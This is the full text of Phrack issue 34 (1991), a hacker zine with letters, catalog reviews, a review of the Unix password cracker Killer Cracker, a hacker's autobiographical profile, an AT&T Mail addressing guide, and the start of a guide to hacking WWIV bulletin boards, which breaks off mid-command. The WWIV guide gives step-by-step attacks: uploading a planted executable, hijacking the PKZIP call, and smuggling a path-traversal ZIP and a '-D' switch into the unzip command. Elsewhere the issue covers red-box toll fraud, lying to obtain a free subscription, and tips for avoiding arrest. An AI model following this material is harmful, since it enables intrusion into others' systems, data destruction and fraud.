==Phrack Inc.== Volume Three, Issue Thirty-four, File #1 of 11 Issue XXXIV Index __________________ P H R A C K 3 4 October 13, 1991 __________________ ~Technology for Survival~ Welcome back to Phrack Inc. From now on, the editorship will consist of Crimson Death and Dispater. We have decided to join both our forces and pool our assets to make Phrack even better. We will have accounts at various Internet sites, however, all file submitions should be mailed to phracksub@stormking.com. If you do not have access to the Internet give Free Speech BBS a call. Crimson Death will take it from there. Special thanks this month goes out to Night Ranger for being great help! Also thanks to Inhuman and Laughing Gas for taking the time to submit material. Phrack has never really had a distrabution BBS, but you can always get it on the Internet at EFF.ORG or CS.WIDENER.COM. Off the Internet, the BBS distribution will be from Free Speech BBS. Below are a list of a few other boards that carry all the Phracks. Free Speech BBS (618) 549-4955 Blitzkreig BBS (502) 499-8933 Digital Underground (812) 941-9427 Pyrotechnic's Pit (407) 254-3655 We would also like to thank the nameless numbers of BBS's out there that carry Phrack Inc. without their names being listed here! In this issue of Phrack Inc. we are starting a "letters to the editor" section called "Phrack Loopback." Any questions, comments, corrections, or problems that you the reader would like to air with Phrack publically will be answered there. Loopback will also contain information such as reviews of other magazines, catalogs, hardware, and softare. With Loopback we hope to make Phrack Inc. more interactive with our readers. This month we had an oportunity to interview one of our "hacker hero's", The Disk Jockey. We are also trying to "liven up" Phrack World News a little by adding some editor's comments about recent news topics. If we get a positive response, we will continue doing this. Hopefully you will respond with your views as well. Your Editors, Crimson Death Dispater cdeath@stormking.com phracksub@stormking.com =============================================================================== COMMENTS INSERTED BY SERVER: As the server of the Phrack Mailing List, I'd like to get a few words in. First, since I am currently a VERY DUMB list server, I am currently not very interactive. I am working with the system administrators and owners to get an interactive "LISTSERV" onto this machine. I would also like to know if anyone can get me access to an IP address via SLIP at an Internet site VERY CLOSE to the Newburgh/Poughkeepsie, NY area. Another thing I could use is a Phrack SubBot for IRC. Something small that would allow you to get information on the release date of the next Phrack, add your name to the Mailing List, find out the Index of the last issue and such. I can handle awk, perl and 'C'. An IRC connection (Not the server software) would also be interesting. Another thing I heard of and am interested in is something that might start a seperate list. There is a game, where you write a program to make a robot to fight another programmed robot. You run these against each other to see who will win. You can then modify the code to try again. It needs to be compatible with an IBM Risc/6000 running AIX 3.1.5 running patch #2006. Help is also needed with SENDMAIL.CF configuration and etc. Basically, if you have something that the SERVER might be interested in, please mail "server@stormking.com". Also, if someone mentions that they are not receiving a copy when they asked to subscribe, anything that DOES bounce back here is automatically deleted. For example, if something comes back from SUSY.THUNDER@POKER.LASVEGAS.NV.CA (Susan Lynn Headley) and I am told that POKER.LASVEGAS.NV.CA is not connected to CYBERPUNK.HAFNER.MARKOFF.NY.NY I will NOT attempt to resolve the message. Storm King List Server =============================================================================== _______________________________________________________________________________ Phrack XXXIV Table of Contents =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 1. Introduction to Phrack 34 by Crimson Death & Dispater 2. Phrack Loopback by The Phrack Staff 3. Phrack Prophile of The Disk Jockey by The Disk Jockey & Dispater 4. The AT&T Mail Gateway by Robert Alien 5. The Complete Guide to Hacking WWIV by Inhuman 6. Hacking Voice Mail Systems by Night Ranger 7. An Introduction to MILNET by Brigadier General Swipe 8. TCP/IP: A Tutorial Part 2 of 2 by The Not 9. Advanced Modem-Oriented BBS Security by Laughing Gas & Dead Cow 10. PWN/Part01 by Dispater 11. PWN/Part02 by Dispater _______________________________________________________________________________ ==Phrack Inc.== Volume Three, Issue Thirty-four, File #2 of 11 ^[-=:< Phrack Loopback >:=-]^ By: The Phrack Staff Phrack Loopback is a forum for you, the reader, to ask questions, air problems, and talk about what ever topic you would like to discuss. This is also the place The Phrack Staff will make suggestions to you by reviewing various items of note; magazines, software, catalogs, hardware, etc. _______________________________________________________________________________ What's on Your Mind ~~~~~~~~~~~~~~~~~~ >Date: Fri, 20 Sep 91 01:22:30 -0400 >To: phracksub@stormking.com > >So what exactly DID happen to Agent Steal? There was a small blurb in >PWN for 33, but gave no details. Why was he arrested, what was confiscated, >and how long will he probably be away for. > >Mind you, this is a tragic loss, since Agent Steal was a gifted hacker and >had a whole lotta balls to boot. > > Sincerely, > > A concerned reader To be honest, it would not in his best interest to say much about his case before his trial. What we have written comes from a very reliable source. Some people close to him are denying everything. This is most likely to keep from happening to him what happened to people like Mind Rape, who have basically been "convicted" by the media. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >From: Drahgon >Date: Thu Sep 26 06:00:35 1991 > > Dear Dispater, > > My name is Drahgon unless, of course. I have several things to blow > from my mind here.... > > How is the progress of Phrack 33? I am not really up on all the > hoopla surrounding it, but I am curious. In high school I often > published "underground newsletters" about the manufacture of drugs and > explosives, etc. The computer underground is a new territory for me > and I have just begun. I would love to hear about your mag....I would > perhaps have something to offer. We at Phrack Inc. are here to publish any kind of information you the reader are interested in. We, unlike many other people out there, will not judge you and can call you a "lamer" if you submit something to us that we might think is a little elementary. We might not necessarily run it in Phrack, but we aren't the kind of people that are going to call you up in the middle of the night on an Alliance Teleconference and harass you. In fact, there are many text files out there that are out-dated and need to be corrected! Simply put, if you are interested in it, there are probably two hundred others out that are afraid to ask, because some El1Te person will call them "stupid." Here at Phrack Inc., WE ARE NOT El1Te, WE ARE JUST COOL AS HELL! We want to help everyone in their quest for knowledge. > Secondly, I want to start my own bbs up here in my town. This > town is dead, but there is still a glint of life, it needs to be > kindled. There are currently no BBS's up here that carry information > of an "alternative nature", and there is in fact laws that prevent > them from springing up. (whatever happened to freedom of the press?), > Well, anyway, I would like to know if you would support a BBS of > mine, and maybe you could give me some pointers... > > Thanx ALOT > DRAHGON That's great! We're always glad to see new faces that are truly interested in helping people by becoming a source of information. If you have any questions about BBS's you should ask the expert, Crimson Death. He will be more than happy to help you out. _______________________________________________________________________________ Corrections ~~~~~~~~~~ In V.3, I#33, File 9 of 13, there was a error. R5 Should have been a 10K pot and not just a resistor. The corrected part of the schematic should look like this: _ +9__S1/ _____________________________________________________________ | | | | | S3 | R1 R2 | R3 o @ o | |___C1___| _____| |_________|/___ / o \___ | | ____|_____|_____|____ | | |\ | | _| | _| o | 6 4 14 | R4 |__ D1 | | R9< | S2 | o _|5 13|_____| _| | |__ | | | | | | |__ R5< | _| | | g |_|10 IC1 8|_ _| | | R8< | | | 556 | |__R6< g |__ | | | _|9 12|_| _| | | | | | | |__C2__g R7< | | | | |_11___3___7___2___1__| | | | | _______________________________________________________________________________ Hardware Catalog Review ~~~~~~~~~~~~~~~~~~~~~~ by Twisted Pair You can never get enough catalogs. One reason is because you never know what off-the-wall parts you'll be needing. From time to time I'll be reviewing catalogs so you'll be able to learn where to get the really good stuff as far as computer equipment, telco test equipment, and IC chips are concerned. In this issue, we study two of them... - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - SYNTRONICS 2143 Guaranty Drive Nashville, Tennessee 37214 (615) 885-5200 I recently saw an issue of "Nuts and Volts" magazine which had a Syntronics ad in it. I sent the dollar they wanted for a catalog. Apparently, demand for the catalogs was so great that they're having some more printed up. They sent my dollar back with an explanation and a partial photocopy of the catalog. An associate on the left coast and I want to build a tone decoder and have been looking for a particular chip for a long time. We found it in this catalog. It's an SSI-202 Tone Decoder IC for $12. Not bad for a chip I was unable to locate in about 30 catalogs I've searched through. A fellow phreak was told by a zit-faced Radio Shack employee over their 800 number, "They had only 3 left and they would cost $100 each." I don't think so. Syntronics is selling plans for an interesting device you hook up to the phone line. With it you can call it and turn on any one of three 110VAC outlets. To turn them on you use simple DTMF commands. This would be useful for turning on your computer, modem, room bug, security lights, etc from a remote location. Plans for this device cost $9 and you'd need the above-mentioned IC chip to build it with. Syntronics carries: ------------------- Project Plans Software Unusual Hardware Kits IC's Transistors - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Telephone International (The marketplace for PO BOX 3589 communications equipment, Crossville, Tennessee 38557 services, and employment) (615) 484-3685 This is a monthly publication you can receive free. It's usually about 30 pages printed on large yellow-pages paper. To save yourself the $50 a year first-class yearly subscription rate, just tell them you're a telephone technician. Tell them you need to often buy PBX's, Terminal Blocks, etc. They'll send it to you free, because you're special! Here's a sampling of stuff you can find in there: ------------------------------------------------- A Complete Digital Switching System with 3200 lines on a flatbed trailer !!!!!! Repaired Payphones Optical Fiber xmission system Operator's Headsets CO Digital multiplexers AT&T teletypes Used FAX machines AT&T Chevy bucket trucks Hookswitches Digital error message announcers Central Office Coin System Processor Cards Telephone International lists a bunch of telco seminars happening around the country on their "Calendar of Events" page. They also list conferences for security organizations including dates and phone numbers you'd need to register. That's it for this edition of Hardware Hacking. Keep an eye out for good suppliers to the Phreak world. Pass'em along to Phrack. -T_W-I_S-T_E-D_ -P_A-I_R- _______________________________________________________________________________ A Review of the Killer Cracker V.7.0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by The Legion of d0oDez As every hacker worth his/her salt knows, the Unix operating system has major security problems when it comes to it's passwd file. Although this may be good as some people think information should not be hoarded, others think information should be kept to be people who can use it best, the one's with the most money. The passwd file is the Unix file that stores the user information which included username, home directory, and passwords among others. I will not go into the basics of Unix as this is not a Unix how-to hack file. It is a review of Killer Cracker 7.0 (aka KC7.) KC7 is a Unix password hacker that is portable to most machines. It is written by Doctor Dissector and is free software as the terms of the GNU General Public License (By the Free Software Foundation
) states. The version 7.0 is not the latest version but seems to be the best to use. It is dated as 6/1/91 which makes it pretty recent. 8.0 is rumored to be out but we have not had the opportunity to review it yet as we are still testing it. ;-) The best thing about KC7 is that you can run it on most machines that will run C programs which happens to include MS-DOS machines. With this in mind, you can now let your PC do the work of hacking passwords in the privacy of your own home without having to use a mainframe which might be a bit risky. The distribution copy of KC7 comes with the following files: KC.EXE -- MS-DOS executable KC.DOC -- Documents Source.DOC -- The source code to KC KC.C -- The Turbo C source code And other files that pertain to DES and word files. KC7 works by taking an ascii file composed of words and encrypting them so that it can compare the encrypted words with the passwords in the PASSWD file. It is pretty efficient but if running on an MS-DOS system, you will probably want to use a machine that is at least a 286-12 or higher. The time to complete a PASSWD file is directly proportional to how large the file is (max size of PASSWD must be less than 64K on an MS-DOS machine) and what speed of machine you are using. There are options which allow you to take words (aka guesses) from other sources as well as a words file. These sources can be words from the PASSWD file such as the username, single characters, and straight ascii characters such as DEL or ^D. It can also manipulate the guesses in various ways which might be helpful in guessing passwords. Another useful option is the RESTORE function. KC7 has the ability to allow the user to abort a crack session and then resume cracking at a later date. This is very nice since one does not always have the time nor patience to crack a 50k passwd file without wanting to use his/her machine for other uses such as trying out new passwords. We have found that the best way, as suggested by the author, to crack is by using the default method which is to crack by word and not by username. You will understand when you get a hold of the software. You can get KC7 at most H/P oriented bbs's as everyone thinks he/she is a Unix wizard nowadays. Overall, KC7 is an excellent program and we suggest it to all Unix hackers. We also hope you have enjoyed this file and we look forward to bringing more interesting reading to your terminal. Until then.... Happy hacking. _____________________________________________________________________________ ==Phrack Inc.== Volume Three, Issue Thirty-Four, File #3 of 11 -*[ P H R A C K XXXIV P R O P H I L E ]*- -=>[ Presented by Dispater ]<=- The Disk Jockey ~~~~~~~~~~~~~~~ Handle: The Disk Jockey (over 10 years now...) Call him: Doug Reach him: douglas@netcom.com Past handles: None Handle origin: Selected it way back in the Apple days, when it was hip to have a hardware-related name. Date of Birth: 12/29/67 Age at current date: 23 Approximate Location: Silicon Valley Height: 6'1" Weight: 220 lbs. Eye color: Green Hair Color: Blond/brown Education: Cornell, Univ of Michigan, Stanford, and a slew of others schools that I had the opportunity to attend. What started out as a strong belief in law became so jaded that I fell back on Comp Sci. Still wake up in the middle of the night yelling "NO!, NO!" Also have a wallpaper degree in Psychology. Computers: First: Apple //. Presently: several. Mac IIfx, 386/33, and several others that I can't seem to get rid of... ------------------------------------------------------------------------------- The Story of my Hacking Career ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ I was lucky enough to be able to get my hands on computers early, back in the days of the PET and the TRS-80. Although we poke fun at a Trash-80 now, at the time I was completely fascinated by it. Remember Newdos/80, LDOS, and utilities like SuperZap? Things started really rolling after a friend introduced me to the Apple. Although I never fell into the stereotype of being a computer "nerd" (don't we all like to think that?), compared to the redundancy of normal schoolwork, learning about the Apple was a new and unexplored world. Unlike most of the other computer "types", I didn't read science fiction, didn't have any social problems, and thought looking at girls was more enjoyable than talking about hardware. Well, depending on the hardware. (ha-ha!) "Cracking" Apple software was of course the next logical step. The 6502 was a wonderful chip, and easy to learn. Copy-cards and other "hacked" hardware was becoming findable and it was getting to the point that the only goal was to get your hands on pre-release software. Before I had entered the "modem" world, friends had a network of other people across the country and traded things by mail. Of course the whole world changed when I picked up a 300 baud modem. Suddenly there was the communication and knowledge that I had been hungry for. People wrote text files on just about everything imaginable. What is the president's phone number? How can I call the pope? How can I make lowercase on my Apple II? What are the routing numbers for boxing to the Eastern Bloc countries? Codes were never much of an interest. The systems that ran them, however, were quite interesting. As technology advanced, SCCs started using sophisticated AI techniques to detect any kind of abnormal usage instantly. Codes used to last several months, now they only lasted a few hours. Boxing, however, was a little more elegant and was the flashy way to call your friends. Even before I had ever heard of boxing or phreaking, I enjoyed the benefits of what we now know as a "red box". While in boarding school, I noticed that a somewhat broken phone emitted obscenely loud "beeps" when you dropped in a quarter. I took a little micro-recorder and recorded myself dropping about $5.00 into the phone. When I played this back into the telephone, the telco thought I was actually dropping change in the machine! I was able to call my girlfriend or whomever and speak for hours. Now most payphones mute those tones so they are barely audible, if at all. Local user groups were a good place to pick up software, legal and otherwise. Remember those damn "CLOAD" magazine tapes for the TRS-80? 80-Micro magazine? The early 80's was the time of the hardware hacker - anything bizarre you wanted you had to make yourself, since it wasn't available otherwise. Now you can call any of a slew of 800 numbers, give them your credit card number (!) and have it on your doorstep the next day. I think part of the problem of the "new generation" of hackers, phreakers, warez kids, etc, is that they never had the experience with low-level stuff and actually having to into the hardware to get what they wanted. Their only programming experience is coming from school, which gives a shallow and usually totally impractical background for the "real world". My eventual disgust with the pirate world came when products such as "Pirate's Friend" came out, allowing people to sector edit out my name and insert theirs. I had spent quite a lot of time trying to find new software, and enjoyed the ego stroke of having my name passed around. I had a lot of respect for book authors that were plagiarized after that... About the industry ~~~~~~~~~~~~~~~~~ The computer industry in general is interesting. Working in it, I hope I'm justified to speak about it. Getting a job is quite easy, since the technology is changing so much, unless it is in something that will be around for some time, you can usually pick up a job by just knowing the latest developments, the buzzwords, and having good "chemistry". In the valley many firms realize that colleges don't really teach you much in the way of practical knowledge. At best, they give you the opportunity to try different types of machines. It amazes me that HR departments in companies across the country won't even look at a resume unless the applicant has a college degree. Advanced degrees are a different matter and are usually quite applicable towards research, but your usual BA/BS variety? Nah. If you want to make a lot of money in this industry, all you need to do is get the reputation as a person who "gets things done" and have superior communication skills. You can write your ticket after that. About legal issues ~~~~~~~~~~~~~~~~~ Anyone who has ever read some of my later text files (1986, 1987) knows that I had no qualms about the legalities of beating an establishment. Although my line of morals was probably beyond where others placed theirs, I could always justify to myself damage or loss to an establishment, "beating the system", rather than hurting the individual. Although I am pretty right-winged in beliefs, I have a great distrust for the policing agencies. Various memories ~~~~~~~~~~~~~~~ Getting a call from my father while at school and being told that Control C had called him and relayed the message "Tell Doug the FBI are after The Disk Jockey. Get rid of everything and hide." To say I "cleaned house" would have been a gross understatement. I knew this was true, I, like many others, had just ridden on the false pretense that they would have better things to do then come after me. I later saw intelligence reports showing that I had been kept track of for some time. I was described as: "Involved in some type of student-loan scam through creating fictitious college applicants at his school. Very violent temper, ruthless attitude. Breaks people's legs for money (TX). Owns a motorcycle and a european sedan. Nasty hacker." Only a handful of people would know that I had a motorcycle, so it was somewhat upsetting that they had this kind of information on me. I later saw some of this same information in Michigan Bell Security's records. They also had the correct phone number for my place at Cornell, my parents number, and even the number of some of my personal non-computer related friends. SummerCon in 1987 was a fun experience. I had the opportunity to meet many of the people that I communicated with regularly, as well as wonder why people thought St. Louis was such a wonderful place. While there were a few socially "on-the-fringe" types, I was amazed that most of the other "hackers" didn't fit the usual stereotypes. They were just regular guys that had a some above average cleverness that allowed them to see the things that others couldn't. By the time I was 20 years old, I had about $40,000 worth of credit on plastic, as well as a $10,000 line of credit for "signature loans" at a local bank. The credit system was something that seemed fun to exploit, and it doesn't take long to figure out how the "system" works. With that kind of cash Aavailable, however, it's tempting to go and buy something outrageous and do things that you wouldn't normally do if you had the cash. This country is really starting to revolve around credit, and it will be very hard to survive if you don't have some form of it. If more people were aware of how the credit systems worked, they might be able to present themselves in a better light to future creditors. I don't think that credit is a difficult thing to understand, I just had an unusual interest in understanding and defeating it. Perhaps this is something that my future text files should be about. Getting busted ~~~~~~~~~~~~~ On June 27, 1988 at 1:47am, I had just parked my car outside my apartment and was walking up to the door when I heard someone say "Doug?" I knew that no friend of mine would be visiting at that hour, so I knew my fate before I turned around. An FBI agent, State police detective and a local detective were walking up to me. "We have a warrant for your arrest." Interestingly, they had actually several warrants, since they weren't sure what my name was. I was being arrested for 6 counts of "conspiracy to commit fraud". After being searched to make sure I wasn't carrying a gun, they asked if they could "go into my apartment and talk about things". Although I had completely "cleaned house" and had nothing to hide in there, I wasn't about to help out an investigation on me. "Ah, I think I had better contact an attorney first." "Is there one you can call right now?" "Are you kidding? It's 2:00am!" I was handcuffed and had my legs strapped together with a belt and was thrown in the back of a car. This was one of those usual government cars that you see in the movies with the blackwalls and usual hubcaps. Interestingly enough, the armrest of the car hid quite an array of radio equipment. Although pretty freaked out, I figured the best thing to do at that point was try to get some sleep and call the best attorney money could by in the morning. Little did I know where I was being brought. I was driven all the way to a small Indiana town (population 5,000) where a 16 year-old Wheatfield Indiana boy had made the statement that he and I "agreed to devise a scam". Although nothing was ever done, merely planning it created the conspiracy charge. I figured that after my arraignment I could post bail and find an attorney. I had almost $10k in the bank and could probably find more if I needed it. I was sadly mistaken. The next day at my arraignment the charges were read and bail was set -- $150,000.00, cash only! In a strange turn of events, the FBI decided to totally drop the case against me. The federal prosecutor figured it wasn't worth wasting his time and they jumped out. However, the Indiana state police were involved in my arrest and were angry that the FBI was dropping the case after they had invested so much time and money in the case, so they decided to pursue the case themselves. There is so much friction between the FBI and state police, that the FBI didn't even answer their letters when they tried to request information and data files on me. Funny. I spent 6 months in a tiny county jail, missing the start and first semester of school. I was interrogated constantly. I never told on a sole and never made a statement about myself. I sat in jail daily, reading books and waiting for my court dates. Although I never expected it, nobody ever thanks you when you keep your mouth shut. I can't imagine that many people would sit in jail for a long time in order to save their friends. Perhaps it's a personal thing, but I always thought that although I doubt someone else would do it for me, I would never, ever tell anything on anyone else. I would never be responsible for someone else's demise. It took a lot of money, and a lot of friday nights of frustration, but I walked away from that incident without ever making a statement. It was at a time when my "roots" were deepest and I probably could have really turned in a lot of other people for my benefit, but it was at a time in my life where I could afford to miss some school and the integrity was more important to me. There were a lot of decisions that had to be made, and spending time in jail is nothing to be proud of, but I never backed down or gave in. It did provide the time for me to really re-evaluate who and what I was, and where I was going. People I've known ~~~~~~~~~~~~~~~~ Compaq Personal friend for some time now. Control C Mostly likely the craziest guy I've ever met. Really nice guy. Knight Lightning Would call me up in the middle of the night and want to discuss philosophical and social issues. Kind of guy I would probably get along with outside of computers as well. Loki Friend since high school. Made a big splash in the h/p world, then disappeared from it. He and I (and Control C) drove to SummerCon together. Shooting Shark Great guy who used to be into calling bridges and would yell "Hey, I'm paying for this!" Truly one of the only people that I ever knew that didn't do anything blatantly illegal. Most of our email was over the optimization of crypt. The Mad Alchemist Sysop of Lunatic Labs, one of the only boards that I feel is worth the telephone call anymore. He has given me a lot of slack and runs a BBS that picks up some of the most obscure information. A sysop that others should be judged by. Tom Brokaw Personal friend since childhood that stood by me through thick and thin, bailing me out of trouble time and time again. I can never thank him enough for being a true friend. BBSs ~~~ More than I could mention here. A few more recent notables -- Atlantis Although run on an Apple, the Lineman had this system so slick and customized that it became the standard that a lot of the PC based boards were created with. It was the first real "clearinghouse" for text files. Free World II Run by Major Havoc and myself, this was an incredibly robust system, and was one of the first to be run on a US Robotics HST. Although it was primarily a discussion board, the file areas offered some of the best files -- virtually no games, but about every real utility and the like. Metal AE 201-879-6668 - this was a true blue AE line that was around for like 5 or 6 years and was ALWAYS busy. Had all of the original cDc and other bizarre text files, occasionally some new Apple warez. Lunatic Labs Still up and still great. Metal Shop Private Perhaps one of the best boards of all time. Run by Taran King and had a healthy, yet secure userlog. It was a closed system, the only way to get on was to know somebody. Everyone on the system knew each other in some sense. World of Cryton One of the first boards to have a "philter" and to really push the messages as far as codes, accounts, card numbers, etc. This was also the demise, along with many of the 414 hackers. Misc ~~~ 2600 Magazine How could I not like a magazine that published articles I wrote? This really is a great magazine and anyone who is interested in computers, privacy, or cyber-issues in general should subscribe. Fame...? Was in the movie "Hoosiers" (thanks for bringing that up, Shark!), even though I'm not a basketball fan. Met Dennis Hopper, etc. Went to school with a lot of famous people's kids. Most have some pretty serious problems. Be glad you are who you are. Marriage...? I'm single and will do everything I can to stay that way. When people ask me about getting married I tell them that the idea of car payments scare me. I enjoy having girlfriends, but I've become too independent. I still run around at bars until sometimes 3:00am or so, but still manage to spend about 50 or 60 hours a week at work. Even if I cut out the bar scene, I wouldn't have much time to spend with someone else on a daily basis. Advice If you ever get into doing illegal things, make sure you do them by yourself. Your chances of getting caught when you do things solo and resist the temptation to "brag" about them is minimal. When someone else knows about what you have done, it doesn't matter how good of a friend they are. If they get into trouble, you are going to the sacrificial lamb when it comes to negotiating their freedom. Even the strongest willed individuals seem to crumble when questioned by police. Groups are bad news. There are very little advantages to being in a group and all it does is increase your personal risk by multitudes. Cracking groups aren't nearly as dangerous, but they DO bring boards down. Look to the fate of groups such as LOD for examples of group fate. Lex Luthor, perhaps one of the most elusive and private hackers of all time was the one to bring down the rest of the group. This was tough for me, as many of the members were people I talked with and could really feel for. Don't get discouraged in life if you feel that you are behind the rest because you don't come from a rich family or have the best equipment. I left home when I was 17 years old, keeping only minimal contact with my parents since then and lived life pretty well, using my abilities to "smooth talk" and pure enthusiasm to walk into about any job. Don't put people down -- everyone has something to teach you, even the bum on the street might be able to tell you how to make some free phone calls! There is a wealth of information to be found via Usenet, text files, or even your school or public library. Stay informed and well read. Email I always enjoy hearing from people. Reach me via the Internet at douglas@netcom.com, or on Lunatic Labs BBS. ________________________________________________________________________________  ==Phrack Inc.== Volume Three, Issue Thirty-four, File #4 of 11 _______________________ || || || The AT&T Mail Gateway || || || || December 19, 1990 || || || || by Robert Alien || ||_______________________|| The Internet Gateway ~~~~~~~~~~~~~~~~~~~ The Internet Gateway provides Internet e-mail users with a method of communication to AT&T Mail. The Interconnect consists of various private email networks and uses an addressing format better know as Domain Addressing Service (DAS). A domain address consists of a user name, followed by an @ sign and/or % sign and a domain name, which is usually the system name. Example: jdoe@attmail.com Sending Email to Internet Users ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ To send email from the AT&T MailService to the Internet community use the UUCP addressing style. Example: internet!system.domain!username Translates to: internet!gnu.ai.mit.edu!jdoe If you are sending e-mail to an Internet user whose e-mail address may be in the RFC 822 format (user@domain), you must translate the RFC address before sending your message to an Internet recipient. username@system.domain (Internet user's address) internet!system.domain!username (to a UUCP address) Example: username%system2@system.domain (Internet user's address) Translates to: internet!system.domain!system2!username Sending Email From The Internet ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ To send email to the AT&T Mail Service, Internet users can choose either the RFC 822 or UUCP addressing style. The Internet recognizes attmail.com as the domain identifier for AT&T Mail when electronic messages are sent through the gateway. Although many Internet users choose to send e-mail using the RFC 822 addressing style, the UUCP style is also available on many UNIX systems on the Internet, but not every system supports UUCP. Below are examples of both addressing styles: RFC 822 Addressing: username@attmail.com Example: jsmith@attmail.com UUCP Addressing: attmail.com!username Example: attmail.com!jdoe Although email can be sent through the Internet gateway, surcharged services, such as Telex, FAX, COD, U.S. Mail, overnight, urgent mail and messages destined to other ADMDs connected to AT&T Mail are not deliverable. If you are an Internet e-mail user attempting to use a surcharged service and are not registered on AT&T Mail, you will not be able to send your message, and will be automatically notified. Below is a list of surcharged services that are unavailable to Internet users. * FAX * Telex * COD * U.S. Mail * Overnight * Administrative Management Domain (ADMD) Messages Sending Email to Bitnet Users ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ To send email to BITNET users from AT&T Mail, enter: internet!host.bitnet!user Sending Email to UUNET Users ~~~~~~~~~~~~~~~~~~~~~~~~~~~ To send email to UUNET users from AT&T Mail via the Internet Gateway, enter: attmail!internet!uunet!system!user Internet Restrictions ~~~~~~~~~~~~~~~~~~~~ The following commercial restrictions apply to the use of the Internet Gateway. * Users are prohibited to use the Internet to carry traffic between commercial (for profit) electronic messaging systems. * Advertising and soliciting i.e., messages offering goods or services for sale or offers of jobs. * Provision of for-profit service, other than electronic messaging to Internet users, is permitted (e.g., database services) if such service is used for scholarly research purposes and its costs are borne by individual or institutional subscription. _______________________________________________________________________________ ==Phrack Inc.== Volume Three, Issue Thirty-four, File #5 of 11 *** *** *** *** *** The Complete Guide *** *** to Hacking WWIV *** *** *** *** by Inhuman *** *** September 1991 *** *** *** *** *** WWIV is one of the most popular BBS programs in the country. With thousands of boards in WWIVnet and hundreds in the spinoff WWIVlink, there is a lot of support and community. The nice thing about WWIV is that it is very easy to set up. This makes it popular among the younger crowd of sysops who can't comprehend the complexities of fossil drivers and batch files. In this file, I will discuss four methods of hacking WWIV to achieve sysop access and steal the user and configuration files. Just remember the number one rule of hacking: Don't destroy, alter, or create files on someone else's computer, unless it's to cover your own trail. Believe me, there is nothing lower than the scum who hack BBSes for the sheer pleasure of formatting someone else's hard drive. But there is nothing wrong (except legally) with hacking a system to look at the sysop's files, get phone numbers, accounts, etc. Good luck. *** *** Technique #1: The Wildcard Upload *** This technique will only work on a board running an unregistered old version of DSZ and a version of WWIV previous to v4.12. It is all based on the fact that if you do a wildcard upload (*.*), whatever file you upload will go into the same directory as DSZ.COM, which is often the main BBS directory. So there are several methods of hacking using this technique. If the sysop is running an unmodified version of WWIV, you can simply compile a modded version of it with a backdoor and overwrite his copy. Your new copy will not be loaded into memory until the BBS either shrinks out (by running an onliner or something), or the sysop terminates the BBS and runs it again. You can also have some fun with two strings that WWIV always recognizes at the NN: prompt: "!@-NETWORK-@!" and "!@-REMOTE-@!". The first is used by WWIVnet to tell the BBS that it is receiving a net call. If the BBS is part of a network and you type "!@-NETWORK-@!", it will then wait for the network password and other data. If the board is not part of a network, it will just act like you typed an invalid user name. The second string is reserved for whatever programs people wanted to write for WWIV, like an off-line reader or whatever. Snarf (the file leeching utility) uses this. If there is not a REMOTE.EXE or REMOTE.COM in the main BBS directory, it will also act as if you entered an invalid user name. So, what you can do is wildcard upload either REMOTE.COM or NETWORK.COM. You want to call them COM files, because if the EXE files already exist, the COM ones will be called first. If the BBS is part of a network, you should go for REMOTE.COM, because if you do NETWORK.COM, it will screw up network communications and the sysop will notice a lot faster. Of course, if you're going straight in for the kill, it doesn't matter. So, what should NETWORK.COM or REMOTE.COM actually be? you ask. Well, you can try renaming COMMAND.COM to one of those two, which would make a DOS shell for you when it was executed. This is tricky, though, because you need to know his DOS version. I suggest a batch file, compiled to a COM file using PC Mag's BAT2EXEC. You can make the batch file have one line: \COMMAND That way you don't have to worry about DOS versions. Remember that this method of hacking WWIV is almost completely obsolete. It is just included for reference, or for some old board run from an empty house where the sysop logs on twice a year or something. *** *** Technique #2: The PKZIP Archive Hack *** Probably the most vulnerable part of WWIV is the archive section. This section allows users to unZIP files to a temporary directory and ZIP the files you want into a temporary ZIP file, then download it. This is useful if you download a file from another board, but one file in it is corrupted. This way you don't have to re-download the whole file. Anyway, on with the show. Make a zip file that contains a file called PKZIP.BAT or COM or EXE. It doesn't matter. This file will be executed, so make it whatever you want, just like in Technique #1. Make it COMMAND.COM, or a batch file, or a HD destroyer, whatever you want. So you upload this file, and then type "E" to extract it. It'll ask you what file to extract and you say the name of the file you just uploaded. It'll then say "Extract What? " and you say "*.*". It'll then unzip everything (your one file) into the TEMP directory. Then go to the archive menu ("G") and pick "A" to add a file to archive. It'll ask what file you want to add, and say anything, it doesn't matter. At this point it will try to execute the command: PKZIP TEMP.ZIP \TEMP\%1 Where %1 is what you just entered. The file pointer is already pointing to the temp directory, so instead of executing PKZIP from the DOS path, it'll execute the file sitting in the current directory, TEMP. So then it runs PKZIP and you get your DOS shell or whatever. If PKZIP does not work, you may want to try uploading another file, and use the same technique, but instead make it an ARC file and call the file in the archive PKPAK. This technique is relatively easy to defeat from the sysop's end, but often they are too lazy, or just haven't heard about it. *** *** Technique #3: The -D Archive Hack *** This technique also plays on the openness of WWIV's archive system. This is another method of getting a file into the root BBS directory, or anywhere on the hard drive, for that matter. First, create a temporary directory on your hard drive. It doesn't matter what it's called. We'll call it TEMP. Then, make a sub-directory of TEMP called AA. It can actually be called any two-character combination, but we'll keep it nice and simple. Then make a subdirectory of AA called WWIV. Place NETWORK.COM or REMOTE.COM or whatever in the directory \TEMP\AA\WWIV. Then from the TEMP directory execute the command: PKZIP -r -P STUFF.ZIP <--- The case of "r" and "P" are important. This will create a zip file of all the contents of the directories, but with all of the directory names recursed and stored. So if you do a PKZIP -V to list the files you should see AA\WWIV\REMOTE.COM, etc. Next, load STUFF.ZIP into a hex editor, like Norton Utilities, and search for "AA". When you find it (it should occur twice), change it to "C:". It is probably a good idea to do this twice, once with the subdirectory called WWIV, and another with it called BBS, since those are the two most common main BBS directory names for WWIV. You may even want to try D: or E: in addition to C:. You could even work backwards, by forgetting the WWIV subdirectory, and just making it AA\REMOTE.COM, and changing the "AA" to "..". This would be foolproof. You could work from there, doing "..\..\DOS\PKZIP.COM" or whatever. Then upload STUFF.ZIP (or whatever you want to call it) to the BBS, and type "E" to extract it to a temporary directory. It'll ask you what file. Type "STUFF.ZIP". It'll ask what you want to extract. Type """-D". It'll then execute: PKUNZIP 